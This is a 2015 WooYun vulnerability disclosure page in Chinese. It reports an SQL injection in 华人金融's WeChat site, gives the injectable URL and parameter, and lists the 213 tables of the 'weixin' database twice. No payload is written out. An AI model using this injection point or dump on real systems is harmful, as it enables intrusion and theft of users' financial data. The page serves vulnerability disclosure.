当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114446

漏洞标题:国美旗下华人金融注入可以获奖 苹果各种设备

相关厂商:华人金融

漏洞作者: 路人甲

提交时间:2015-05-16 16:17

修复时间:2015-06-30 16:18

公开时间:2015-06-30 16:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-16: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-30: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

平台发挥资源整合与协同效应优势,使传统金融业务和互联网技术相结合,实现金融创新业务的飞速发展,致力于为大众用户提供全方位的互联网投融资服务。

详细说明:

注册点:http://wx.5262.com/index.php?token=psvgsb1430169428*&g=Ci&m=Member&a=Recommend&code=0114732deb357570756e5d7a9f1809el&state= (GET)
能查到我的注册的信息,不要封号哦
注入数据库:

Database: weixin
[213 tables]
+--------------------------------------+
| ycwx_access                          |
| ycwx_adma                            |
| ycwx_alipay_config                   |
| ycwx_api                             |
| ycwx_areply                          |
| ycwx_attribute                       |
| ycwx_behavior                        |
| ycwx_busines                         |
| ycwx_busines_comment                 |
| ycwx_busines_main                    |
| ycwx_busines_pic                     |
| ycwx_busines_second                  |
| ycwx_car                             |
| ycwx_car_utility                     |
| ycwx_carmodel                        |
| ycwx_carnews                         |
| ycwx_carowner                        |
| ycwx_carsaler                        |
| ycwx_carseries                       |
| ycwx_carset                          |
| ycwx_caruser                         |
| ycwx_case                            |
| ycwx_catemenu                        |
| ycwx_ci_checkin_log                  |
| ycwx_ci_draw_log                     |
| ycwx_ci_excharge_log                 |
| ycwx_ci_oauth                        |
| ycwx_ci_prize                        |
| ycwx_ci_score_log                    |
| ycwx_ci_user                         |
| ycwx_classify                        |
| ycwx_company                         |
| ycwx_company_staff                   |
| ycwx_dining                          |
| ycwx_dining_cat                      |
| ycwx_dining_company                  |
| ycwx_dining_diningtable              |
| ycwx_dining_table                    |
| ycwx_dish                            |
| ycwx_dish_company                    |
| ycwx_dish_like                       |
| ycwx_dish_order                      |
| ycwx_dish_sort                       |
| ycwx_dish_table                      |
| ycwx_diyform                         |
| ycwx_diyform_set                     |
| ycwx_diymen_class                    |
| ycwx_diymen_set                      |
| ycwx_ershou                          |
| ycwx_ershou_config                   |
| ycwx_estate                          |
| ycwx_estate_album                    |
| ycwx_estate_expert                   |
| ycwx_estate_housetype                |
| ycwx_estate_impress                  |
| ycwx_estate_impress_add              |
| ycwx_estate_son                      |
| ycwx_files                           |
| ycwx_flash                           |
| ycwx_forum_comment                   |
| ycwx_forum_config                    |
| ycwx_forum_message                   |
| ycwx_forum_topics                    |
| ycwx_function                        |
| ycwx_greeting_card                   |
| ycwx_home                            |
| ycwx_home_background                 |
| ycwx_host                            |
| ycwx_host_list_add                   |
| ycwx_host_order                      |
| ycwx_hotels_house                    |
| ycwx_hotels_house_sort               |
| ycwx_hotels_order                    |
| ycwx_img                             |
| ycwx_indent                          |
| ycwx_keyword                         |
| ycwx_leave                           |
| ycwx_links                           |
| ycwx_liveapp                         |
| ycwx_lottery                         |
| ycwx_lottery_cheat                   |
| ycwx_lottery_record                  |
| ycwx_market                          |
| ycwx_market_area                     |
| ycwx_market_cate                     |
| ycwx_market_nav                      |
| ycwx_market_park                     |
| ycwx_market_slide                    |
| ycwx_medical_set                     |
| ycwx_medical_user                    |
| ycwx_member                          |
| ycwx_member_card_contact             |
| ycwx_member_card_coupon              |
| ycwx_member_card_create              |
| ycwx_member_card_custom              |
| ycwx_member_card_exchange            |
| ycwx_member_card_focus               |
| ycwx_member_card_info                |
| ycwx_member_card_integral            |
| ycwx_member_card_notice              |
| ycwx_member_card_pay_record          |
| ycwx_member_card_set                 |
| ycwx_member_card_sign                |
| ycwx_member_card_use_record          |
| ycwx_member_card_vip                 |
| ycwx_moopha_article                  |
| ycwx_moopha_attachement              |
| ycwx_moopha_channel                  |
| ycwx_moopha_channel_contentattribute |
| ycwx_moopha_keywords                 |
| ycwx_moopha_picture                  |
| ycwx_moopha_site                     |
| ycwx_moopha_template                 |
| ycwx_moopha_user                     |
| ycwx_msg                             |
| ycwx_nearby_user                     |
| ycwx_node                            |
| ycwx_norms                           |
| ycwx_ordering_class                  |
| ycwx_ordering_set                    |
| ycwx_other                           |
| ycwx_panorama                        |
| ycwx_photo                           |
| ycwx_photo_list                      |
| ycwx_pic_wall                        |
| ycwx_pic_walllog                     |
| ycwx_product                         |
| ycwx_product_attribute               |
| ycwx_product_cart                    |
| ycwx_product_cart_list               |
| ycwx_product_cat                     |
| ycwx_product_detail                  |
| ycwx_product_diningtable             |
| ycwx_product_image                   |
| ycwx_product_mail_price              |
| ycwx_product_setting                 |
| ycwx_recipe                          |
| ycwx_recognition                     |
| ycwx_reply                           |
| ycwx_reply_info                      |
| ycwx_requestdata                     |
| ycwx_research                        |
| ycwx_research_answer                 |
| ycwx_research_question               |
| ycwx_research_result                 |
| ycwx_reservation                     |
| ycwx_reservebook                     |
| ycwx_role                            |
| ycwx_role_user                       |
| ycwx_router                          |
| ycwx_router_config                   |
| ycwx_school_classify                 |
| ycwx_school_score                    |
| ycwx_school_set_index                |
| ycwx_school_students                 |
| ycwx_school_tcourse                  |
| ycwx_school_teachers                 |
| ycwx_selfform                        |
| ycwx_selfform_input                  |
| ycwx_selfform_value                  |
| ycwx_send_message                    |
| ycwx_service_logs                    |
| ycwx_service_user                    |
| ycwx_setinfo                         |
| ycwx_shake                           |
| ycwx_shake_rt                        |
| ycwx_shakelog                        |
| ycwx_share                           |
| ycwx_share_set                       |
| ycwx_sign_conf                       |
| ycwx_sign_in                         |
| ycwx_sign_set                        |
| ycwx_site_plugmenu                   |
| ycwx_sms_expendrecord                |
| ycwx_sms_record                      |
| ycwx_snccode                         |
| ycwx_styleset                        |
| ycwx_system_info                     |
| ycwx_taobao                          |
| ycwx_text                            |
| ycwx_token_open                      |
| ycwx_update_record                   |
| ycwx_upgrade                         |
| ycwx_upyun_attachement               |
| ycwx_user                            |
| ycwx_user_group                      |
| ycwx_user_request                    |
| ycwx_userinfo                        |
| ycwx_users                           |
| ycwx_vcard                           |
| ycwx_vcard_list                      |
| ycwx_voiceresponse                   |
| ycwx_vote                            |
| ycwx_vote_item                       |
| ycwx_vote_record                     |
| ycwx_wall                            |
| ycwx_wall_member                     |
| ycwx_wall_message                    |
| ycwx_wall_prize_record               |
| ycwx_wecha_user                      |
| ycwx_wechat_group                    |
| ycwx_wechat_group_list               |
| ycwx_wecht_grout                     |
| ycwx_wedding                         |
| ycwx_wedding_info                    |
| ycwx_wehcat_member_enddate           |
| ycwx_wxuser                          |
| ycwx_ycemail                         |
| ycwx_ycsms                           |
| ycwx_yuyue                           |
| ycwx_yuyue_order                     |
| ycwx_yuyue_setcin                    |
| ycwx_zhida                           |
+--------------------------------------+


嘿嘿,正好官网举行活动, watch 免费送 ,好心动 。最终止住诱惑,默默提交

漏洞证明:

注册点:http://wx.5262.com/index.php?token=psvgsb1430169428*&g=Ci&m=Member&a=Recommend&code=0114732deb357570756e5d7a9f1809el&state= (GET)
能查到我的注册的信息,不要封号哦
注入数据库:

Database: weixin
[213 tables]
+--------------------------------------+
| ycwx_access                          |
| ycwx_adma                            |
| ycwx_alipay_config                   |
| ycwx_api                             |
| ycwx_areply                          |
| ycwx_attribute                       |
| ycwx_behavior                        |
| ycwx_busines                         |
| ycwx_busines_comment                 |
| ycwx_busines_main                    |
| ycwx_busines_pic                     |
| ycwx_busines_second                  |
| ycwx_car                             |
| ycwx_car_utility                     |
| ycwx_carmodel                        |
| ycwx_carnews                         |
| ycwx_carowner                        |
| ycwx_carsaler                        |
| ycwx_carseries                       |
| ycwx_carset                          |
| ycwx_caruser                         |
| ycwx_case                            |
| ycwx_catemenu                        |
| ycwx_ci_checkin_log                  |
| ycwx_ci_draw_log                     |
| ycwx_ci_excharge_log                 |
| ycwx_ci_oauth                        |
| ycwx_ci_prize                        |
| ycwx_ci_score_log                    |
| ycwx_ci_user                         |
| ycwx_classify                        |
| ycwx_company                         |
| ycwx_company_staff                   |
| ycwx_dining                          |
| ycwx_dining_cat                      |
| ycwx_dining_company                  |
| ycwx_dining_diningtable              |
| ycwx_dining_table                    |
| ycwx_dish                            |
| ycwx_dish_company                    |
| ycwx_dish_like                       |
| ycwx_dish_order                      |
| ycwx_dish_sort                       |
| ycwx_dish_table                      |
| ycwx_diyform                         |
| ycwx_diyform_set                     |
| ycwx_diymen_class                    |
| ycwx_diymen_set                      |
| ycwx_ershou                          |
| ycwx_ershou_config                   |
| ycwx_estate                          |
| ycwx_estate_album                    |
| ycwx_estate_expert                   |
| ycwx_estate_housetype                |
| ycwx_estate_impress                  |
| ycwx_estate_impress_add              |
| ycwx_estate_son                      |
| ycwx_files                           |
| ycwx_flash                           |
| ycwx_forum_comment                   |
| ycwx_forum_config                    |
| ycwx_forum_message                   |
| ycwx_forum_topics                    |
| ycwx_function                        |
| ycwx_greeting_card                   |
| ycwx_home                            |
| ycwx_home_background                 |
| ycwx_host                            |
| ycwx_host_list_add                   |
| ycwx_host_order                      |
| ycwx_hotels_house                    |
| ycwx_hotels_house_sort               |
| ycwx_hotels_order                    |
| ycwx_img                             |
| ycwx_indent                          |
| ycwx_keyword                         |
| ycwx_leave                           |
| ycwx_links                           |
| ycwx_liveapp                         |
| ycwx_lottery                         |
| ycwx_lottery_cheat                   |
| ycwx_lottery_record                  |
| ycwx_market                          |
| ycwx_market_area                     |
| ycwx_market_cate                     |
| ycwx_market_nav                      |
| ycwx_market_park                     |
| ycwx_market_slide                    |
| ycwx_medical_set                     |
| ycwx_medical_user                    |
| ycwx_member                          |
| ycwx_member_card_contact             |
| ycwx_member_card_coupon              |
| ycwx_member_card_create              |
| ycwx_member_card_custom              |
| ycwx_member_card_exchange            |
| ycwx_member_card_focus               |
| ycwx_member_card_info                |
| ycwx_member_card_integral            |
| ycwx_member_card_notice              |
| ycwx_member_card_pay_record          |
| ycwx_member_card_set                 |
| ycwx_member_card_sign                |
| ycwx_member_card_use_record          |
| ycwx_member_card_vip                 |
| ycwx_moopha_article                  |
| ycwx_moopha_attachement              |
| ycwx_moopha_channel                  |
| ycwx_moopha_channel_contentattribute |
| ycwx_moopha_keywords                 |
| ycwx_moopha_picture                  |
| ycwx_moopha_site                     |
| ycwx_moopha_template                 |
| ycwx_moopha_user                     |
| ycwx_msg                             |
| ycwx_nearby_user                     |
| ycwx_node                            |
| ycwx_norms                           |
| ycwx_ordering_class                  |
| ycwx_ordering_set                    |
| ycwx_other                           |
| ycwx_panorama                        |
| ycwx_photo                           |
| ycwx_photo_list                      |
| ycwx_pic_wall                        |
| ycwx_pic_walllog                     |
| ycwx_product                         |
| ycwx_product_attribute               |
| ycwx_product_cart                    |
| ycwx_product_cart_list               |
| ycwx_product_cat                     |
| ycwx_product_detail                  |
| ycwx_product_diningtable             |
| ycwx_product_image                   |
| ycwx_product_mail_price              |
| ycwx_product_setting                 |
| ycwx_recipe                          |
| ycwx_recognition                     |
| ycwx_reply                           |
| ycwx_reply_info                      |
| ycwx_requestdata                     |
| ycwx_research                        |
| ycwx_research_answer                 |
| ycwx_research_question               |
| ycwx_research_result                 |
| ycwx_reservation                     |
| ycwx_reservebook                     |
| ycwx_role                            |
| ycwx_role_user                       |
| ycwx_router                          |
| ycwx_router_config                   |
| ycwx_school_classify                 |
| ycwx_school_score                    |
| ycwx_school_set_index                |
| ycwx_school_students                 |
| ycwx_school_tcourse                  |
| ycwx_school_teachers                 |
| ycwx_selfform                        |
| ycwx_selfform_input                  |
| ycwx_selfform_value                  |
| ycwx_send_message                    |
| ycwx_service_logs                    |
| ycwx_service_user                    |
| ycwx_setinfo                         |
| ycwx_shake                           |
| ycwx_shake_rt                        |
| ycwx_shakelog                        |
| ycwx_share                           |
| ycwx_share_set                       |
| ycwx_sign_conf                       |
| ycwx_sign_in                         |
| ycwx_sign_set                        |
| ycwx_site_plugmenu                   |
| ycwx_sms_expendrecord                |
| ycwx_sms_record                      |
| ycwx_snccode                         |
| ycwx_styleset                        |
| ycwx_system_info                     |
| ycwx_taobao                          |
| ycwx_text                            |
| ycwx_token_open                      |
| ycwx_update_record                   |
| ycwx_upgrade                         |
| ycwx_upyun_attachement               |
| ycwx_user                            |
| ycwx_user_group                      |
| ycwx_user_request                    |
| ycwx_userinfo                        |
| ycwx_users                           |
| ycwx_vcard                           |
| ycwx_vcard_list                      |
| ycwx_voiceresponse                   |
| ycwx_vote                            |
| ycwx_vote_item                       |
| ycwx_vote_record                     |
| ycwx_wall                            |
| ycwx_wall_member                     |
| ycwx_wall_message                    |
| ycwx_wall_prize_record               |
| ycwx_wecha_user                      |
| ycwx_wechat_group                    |
| ycwx_wechat_group_list               |
| ycwx_wecht_grout                     |
| ycwx_wedding                         |
| ycwx_wedding_info                    |
| ycwx_wehcat_member_enddate           |
| ycwx_wxuser                          |
| ycwx_ycemail                         |
| ycwx_ycsms                           |
| ycwx_yuyue                           |
| ycwx_yuyue_order                     |
| ycwx_yuyue_setcin                    |
| ycwx_zhida                           |
+--------------------------------------+


嘿嘿,正好官网举行活动, watch 免费送 ,好心动 。最终止住诱惑,默默提交

修复方案:

过滤
求送礼物 watch

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论